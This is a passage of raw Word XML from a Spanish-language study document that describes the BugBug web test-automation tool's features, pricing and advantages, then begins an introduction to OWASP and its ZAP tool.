      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="0016619D" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FA72997" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Selectores automáticos (Automatic Selectors)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AF33A75" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>El sistema trata de elegir automáticamente el mejor selector CSS/XPath para los elementos. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:tooltip="BugBug's features" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="2D83FC57" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75AB85F8" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Smart waiting, scroll &amp; click inteligente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="503F754D" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Esperas automáticas (sin tener que poner “sleep” manual), desplazamiento automático, clics con comportamiento humano, etc. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:tooltip="BugBug's features" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="278D9355" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B7468A0" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Componentes reutilizables, variables, lógica condicional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BDEA5DA" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Para hacer pruebas más complejas y mantenerlas, evitando repetir pasos comunes entre pruebas. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:tooltip="Test Automation Tool for QA" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="3BADE4FD" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D59F685" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Ejecución local vs ejecución en la nube</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5359ED" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Localmente en tu Chrome (gratis ilimitado para muchas funciones) y en la nube para pruebas regulares, agendadas, etc. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId15" w:tooltip="BugBug's features" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="7994EBA0" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19369C8C" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Notificaciones, alertas, programación de pruebas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F206A25" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Puedes programar que pruebas corran automáticamente (por ejemplo cada día, varias veces), recibir alertas si algo falla (correo, Slack, etc.) (</w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:tooltip="Test Automation Tool for QA" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001D1995" w:rsidRPr="001D1995" w14:paraId="4A682BC4" w14:textId="77777777" w:rsidTr="001D1995">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61203F53" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>Integraciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2A4A11" w14:textId="77777777" w:rsidR="001D1995" w:rsidRPr="001D1995" w:rsidRDefault="001D1995" w:rsidP="001D1995">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub, GitLab, Bitbucket, Slack, Zapier, Webhooks, etc. </w:t>
            </w:r>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>También hay API pública, CLI para ejecución programática. (</w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:tooltip="Integrations" w:history="1">
              <w:r w:rsidRPr="001D1995">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="es-BO"/>
                </w:rPr>
                <w:t>BugBug</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="001D1995">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-BO"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BC14D51" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27949736" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289CBDA5" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Modelos de Precios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20242089" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>BugBug usa un modelo freemium, con varios planes. Estos son los puntos más importantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2500E716" w14:textId="0124FE25" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan gratuito (“Free forever”): incluye pruebas locales ilimitadas, usuarios ilimitados, grabación de pruebas, pruebas básicas, historial limitado, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EADFD20" w14:textId="03368020" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">Planes de pago (PRO, BUSINESS, etc.): añaden ejecución en la nube ilimitada, más capacidad para paralelizar pruebas, más historial, notificaciones, integración más avanzada, soporte prioritario, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D48F10" w14:textId="5CDE0552" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t xml:space="preserve">Precio de referencia: según reseñas externas, el plan PRO está en unos USD 189/mes para ciertas características. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42918F23" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4886A4CB" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00CA2C55">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Ventajas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CCD4B" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Algunas de las ventajas de usar BugBug:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190CB660" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mayor rapidez para empezar: no necesitas montar entornos complicados ni escribir muchos scripts. Ideal para equipos pequeños o sin especialistas en automatización.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD4BBB" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Costo más bajo en muchos casos, especialmente si las pruebas simples (sin necesidad de muchas personalizaciones) son suficientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F0A04" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Accesible para personas no técnicas: product owners, testers manuales, etc., pueden participar más en la creación de pruebas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6000276C" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Mantenimiento más manejable gracias a componentes reutilizables, selector automático, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F550A0" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="00386DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00386DC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
        <w:t>Integración con flujo moderno de desarrollo (CI/CD, notificaciones, ejecución en la nube, paralelización) lo que permite que las pruebas formen parte del flujo habitual de devs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C36910F" w14:textId="77777777" w:rsidR="00386DC1" w:rsidRPr="00386DC1" w:rsidRDefault="00386DC1" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C95438E" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="252F0082" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2500399F" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F152F6" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2238181D" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283993B8" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B719F91" w14:textId="77777777" w:rsidR="001D1995" w:rsidRDefault="001D1995" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14829BD2" w14:textId="43A26B81" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP (OPEN WEB APPLICATION SECURITY PROJECT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7119B92B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> es una </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>organización sin fines de lucro</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> dedicada a mejorar la seguridad del software. Proporciona herramientas, documentación y estándares abiertos para ayudar a desarrolladores, empresas y profesionales de la seguridad a proteger aplicaciones web y APIs contra amenazas cibernéticas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C8B434" w14:textId="6A782503" w:rsidR="009F0340" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Es conocida por su </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Top 10 de Riesgos de Seguridad en Aplicaciones Web</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, una lista de las vulnerabilidades más críticas que afectan a aplicaciones en producción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDFF6B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Características principales de OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFC6124" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Proyectos de seguridad líderes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4027A7E6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP mantiene herramientas y frameworks ampliamente utilizados en la industria:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C610C47" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ZAP (Zed Attack Proxy)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Herramienta de pentesting automático y manual.</w:t>
      </w:r>
    </w:p>
